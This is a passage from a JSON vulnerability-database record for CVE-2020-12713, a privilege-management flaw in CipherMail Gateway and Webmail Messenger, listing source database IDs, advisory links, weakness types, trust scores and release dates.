        "id": "CNNVD-202006-821",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "PACKETSTORM",
        "id": "158001"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ]
  },
  "id": "VAR-202006-0395",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      }
    ],
    "trust": 0.02
  },
  "last_update_date": "2023-12-18T13:33:02.578000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Background info on CVE-2020-12713 \u0026 CVE-2020-12713",
        "trust": 0.8,
        "url": "https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html"
      },
      {
        "title": "Email encryption gateway",
        "trust": 0.8,
        "url": "https://www.ciphermail.com/gateway.html"
      },
      {
        "title": "CipherMail security advisory.",
        "trust": 0.8,
        "url": "https://www.ciphermail.com/news.html"
      },
      {
        "title": "CipherMail Webmail Messenger",
        "trust": 0.8,
        "url": "https://www.ciphermail.com/secure-webmail.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-269",
        "trust": 1.9
      },
      {
        "problemtype": "CWE-326",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.4,
        "url": "http://packetstormsecurity.com/files/158001/ciphermail-community-virtual-appliance-4.6.2-code-execution.html"
      },
      {
        "trust": 1.9,
        "url": "https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html"
      },
      {
        "trust": 1.9,
        "url": "https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities"
      },
      {
        "trust": 1.8,
        "url": "https://www.ciphermail.com/gateway.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.ciphermail.com/news.html"
      },
      {
        "trust": 1.8,
        "url": "https://www.ciphermail.com/secure-webmail.html"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12713"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-12713"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-12714"
      },
      {
        "trust": 0.1,
        "url": "https://www.coresecurity.com/core-labs."
      },
      {
        "trust": 0.1,
        "url": "https://www.ciphermail.com/"
      },
      {
        "trust": 0.1,
        "url": "https://www.coresecurity.com."
      },
      {
        "trust": 0.1,
        "url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "PACKETSTORM",
        "id": "158001"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "db": "PACKETSTORM",
        "id": "158001"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "date": "2020-06-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "date": "2020-07-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "date": "2020-06-09T19:45:24",
        "db": "PACKETSTORM",
        "id": "158001"
      },
      {
        "date": "2020-06-11T02:15:10.477000",
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "date": "2020-06-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-06-22T00:00:00",
        "db": "VULHUB",
        "id": "VHN-165419"
      },
      {
        "date": "2020-06-22T00:00:00",
        "db": "VULHUB",
        "id": "VHN-165420"
      },
      {
        "date": "2020-07-17T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      },
      {
        "date": "2020-06-22T18:09:03.423000",
        "db": "NVD",
        "id": "CVE-2020-12713"
      },
      {
        "date": "2020-06-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "158001"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "CipherMail Gateway and  Webmail Messenger Vulnerability related to authority management in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-006804"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202006-822"
      }
    ],
    "trust": 0.6
  }
}

